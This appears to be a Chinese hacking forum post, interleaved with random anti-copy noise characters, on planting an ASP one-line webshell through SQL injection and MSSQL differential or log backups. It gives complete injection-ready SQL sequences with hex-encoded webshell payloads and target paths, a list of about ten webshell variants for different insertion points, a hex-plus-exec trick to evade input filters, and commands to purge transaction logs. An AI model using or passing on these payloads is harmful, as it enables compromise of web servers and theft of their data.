MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
. b# c' R  h, Z+ s! d) w" l/ U' Hbackup database 库名 to disk = 'c:\ddd.bak';--
( \5 l1 S6 f( A" e+ f( e3 Y+ |" g
' y" N4 k8 H/ P5 T2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
! X1 {9 }$ H1 G( g; P, @insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
) _, N" c) N3 t# g; j0 c7 {" k
) L$ b7 M0 Y3 g. [3.进行差异备份
# C6 j8 z9 I0 ?$ e5 Fbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

. o+ }9 l' L8 S1 n7 v上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>
# ], \5 R; L+ \  T" }
如下是网上常见的差异备份代码，思路一样！
5 f3 e1 _2 a% a5 G===================================================
- W) Q4 }. B9 ?7 z* j* L利用差异备份提高提高backupwebshell的成功率,减少文件大小
  k7 W+ E) ~# a! Z# K! U* i步骤:
& D: ~* _4 i: l) z# L$ C9 J! P! w4 I
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


, T7 X/ J, u4 H6 z9 Kinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

0 I: O9 ?# a/ Y# E1 |declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
8 b- L5 ?  M1 b. o2 D6 i  N
drop table [xiaolu]  -- 删除此表。
- w5 _1 A! f1 B" u
0x77006F006B0061006F002E00620061006B00为wokao.bak
) {4 F# c3 c  h& \! v' Q) _" x) m0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
6 G: M4 n! i) U, Z" N% f0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
  i* S% k% {0 ^% K6 }# o2 u
% o$ h  O) M2 ~3 w# y' d声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
# I% w. X3 E3 e3 ^: k3 q===============================================================
" V7 L! p9 }" U' K6 M( }  G# m
. t4 u' Z# z" G; x; ~9 B$ ^0 a我发现上面代码，有时会无效，而直接用
7 O' s6 y$ P* K" P
6 Y* ~, u" I/ Wbackup database 库名 to disk = 'c:\ddd.bak'

' I0 S. P2 K1 _/ N. J- w: Ocreate table [dbo].[dtest] ([cmd] [image]);
0 O4 q* Y8 u1 D, F) i
: I; `* Z% ^# n$ x0 e! Ginsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
: D) Q7 U: F% X1 a$ t
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
% B: i4 I1 a% d% S9 \) f; \8 b
: X3 J9 P) f( P& E! @0 y1 {7 c库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

网上还有log增量备份的，我也把他记录一下
=====================================================
另一种log增量备份技术:
. V* ~* v* B# b' {$ R
6 y2 q1 S! a; w0 w8 M' \/ r4 b';alter database null set RECOVERY FULL--
7 ]2 h, D6 s! F! h
';create table cmd (a image)--
/ j( [# |' U- d4 i$ v6 h
';backup log null to disk = 'f:\cmd' with init--
% d& D% @( b, e, A6 ^9 x* y8 ^
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
7 N  A9 E+ E3 E, e7 X
';backup log null to disk = '备份路径'--
4 W2 Z- @0 w2 i9 B8 M. A
9 ~2 w3 ^, {. n8 s% i8 g# C8 E';drop table cmd--
, M" p5 \) V5 [9 ?
';alter database XXX set RECOVERY SIMPLE--

$ R; d% E# ^. h5 ]0 sPS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

7 Z: _, c+ t# g0 e; h& {9 `7 g8 P, u说到一句话马，还可以有这么几种写法：

! m* H, R! Z4 V, b5 u1 }+ f( _- r+ Na)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
0 a" K5 K3 ?2 W  y6 P; d9 i* K/ t$ ~3 Vd)<script language=VBScript runat=server>execute request("a")</script>
4 n% W/ L* D3 L5 e) R9 ue)<%25Execute(request("a"))%25>
6 V+ O  M) U. W7 T$ [9 I& Af)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
3 |; g7 i4 g8 R7 A, ]0 O) II)<%eval request(0)%>
9 x8 s) O9 b0 D. R" q. TJ)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
& ~9 y9 y, ?3 a
=============================================

当遇到差备过滤了/时用这个语句代替

declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
( T7 R  Y) |+ F. J. M
把要执行的语句转16进制然后用exec执行
5 x, p" m, m* t* n
3 e4 T8 O" c* x; S1 L% F$ n; s9 j
9 g; f/ K, M( ^( t7 @+ Y减少备份文件大小方法如下:

, v$ z8 ~* q8 P# Q. o( G总的来说就是那么简单几句,下面以备份数据库model为例子
1
5 a! E" S; f) ?1 V9 v+ G2 Vid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
! I5 }( a; o9 T  \id=1;backup database model to disk='你的路径‘ with differential,format;--


: X: o: ~% q3 }) p% U' N. P2 L
2 o2 e  s* }1 Z3 ~  PSQL语句清理日志
' a+ O5 l. `% t: I% _注：test为数据库名

" U$ Q+ N) }* j( Y7 c* l4 N8 Z; C--清空日志
DUMP TRANSACTION test WITH NO_LOG
  M( C" `/ z3 p* y7 G
--截断事务日志
6 ]2 n$ e/ _7 Y( J2 rBACKUP LOG test WITH NO_LOG

- Y; N- H0 c* ?/ [4 a) b% r% c--收缩数据库
6 G  F4 I6 B, rDBCC SHRINKDATABASE(test)
$ y6 b2 q. \; n( ^6 b$ s
--收缩指定数据文件,1是文件号,可以通过这个语句查询到
" a. c. E2 k3 c+ c5 J, V, c! DSelect * from sysfiles DBCC SHRINKFILE(1)

) f. }% w" h* b* f9 _6 ^0 V--以后能自动收缩
0 T) M' l% F. @% C+ a% v4 @" TEXEC sp_dboption 'test', 'autoshrink', 'TRUE'